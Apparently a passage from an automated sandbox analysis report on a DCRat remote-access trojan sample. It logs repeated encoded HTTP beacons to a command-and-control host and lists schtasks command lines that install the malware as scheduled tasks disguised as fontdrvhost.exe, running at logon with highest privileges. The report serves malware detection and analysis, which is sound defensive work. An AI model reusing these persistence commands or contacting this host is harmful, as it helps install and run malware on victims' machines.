                              CF-RAY: 8bbb927759f27cf6-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              39 | 192.168.2.4 | 49776 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:25.747983932 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:26.482889891 CEST | 735 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:26 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FIj0Wdgveryri0g%2FoOus%2FSR7%2BJ6Q%2Fe4PqC8OIdBqOBXsniV1pb1%2FLQKo8qLcOhe7q%2B7OSC90Tfv1zTMTdzHy19AWuSofkw2bktFLUJwg7GBOwqDNR3RiqLw8mJgWHXsWdU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb929c7b821a0f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              40 | 192.168.2.4 | 49777 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:31.510073900 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:32.248987913 CEST | 721 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRbjg3j6Pf8HgKLg4P5K6NW7OPT4Kodtm9qyoTcDlNlg7DnxC1nalJXbZw0MqqO9hnRiaY4chAsWlv755eJO5mP2XqTm7OjANeHAHDuP9hRbKTuksTGBeJ8Z973zqCohf4Q%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb92c078e48c8a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              41 | 192.168.2.4 | 49778 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:37.306967020 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:38.066867113 CEST | 727 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPU3o8HNIfFLwQqhHc2U%2FvB7hJpgQv9SGiwSOgOfO7tnXXvZAFK57g4QVb7T3ZmQJbL5VaZFroWeX%2BE9ncZy%2F4WFxN8i3Pmbahv9sOYvydmnVoq5Cz4zXf2QRzQUIG7N4DY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb92e4cac4429e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              42 | 192.168.2.4 | 49779 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:43.077822924 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:43.792327881 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvnevmwbzyMQWAOXp28osqg%2FKjSL0mGwC0mJWHjaV9FSwgOzv8aqJSdGFE5ee7uiFUFSi%2BiGZOnhaylSWgeBkFQ0BWFNPq1LzJiNRq6qhQz%2BrZoHPIaDtvbczuMDp4AFE%2FU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9308beec43c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0
                              Aug 31, 2024 10:15:44.008378983 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvnevmwbzyMQWAOXp28osqg%2FKjSL0mGwC0mJWHjaV9FSwgOzv8aqJSdGFE5ee7uiFUFSi%2BiGZOnhaylSWgeBkFQ0BWFNPq1LzJiNRq6qhQz%2BrZoHPIaDtvbczuMDp4AFE%2FU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9308beec43c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              43 | 192.168.2.4 | 49780 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:48.830816031 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:49.567601919 CEST | 725 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngbdD9gE63qar8piwCpcw1HTVoCXfS1ZehXfDblo2ffmvRruUJNuJ9Mh8Vp0DA6hVCu9eMgitcZ%2FpGB85UJFYOmSuDtPLvcNMR0swuPUwugDY922EaHuzgh%2BtPuTH3pGggA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb932cc83f43f1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              44 | 192.168.2.4 | 49781 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:54.747430086 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:55.499761105 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ts%2F9PvNmRzU6acDUv2g%2Bay3MpzPoLcVXuAQUQG%2FvTvrp5hoxe4SSl7ZRuTrWk4BMKpxO3Vay29CNLZDV95Vbaxu%2BjFR8yMrtpAMHGB4ExjykFgkjMd2ug4IY%2FxYiIdeVOns%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9351bf1e0f3b-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Target ID:0
                              Start time:04:11:52
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\dmhu7oz5yP.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\dmhu7oz5yP.exe"
                              Imagebase:0x2b0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1672344237.000000000278B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.1640757413.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1672344237.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
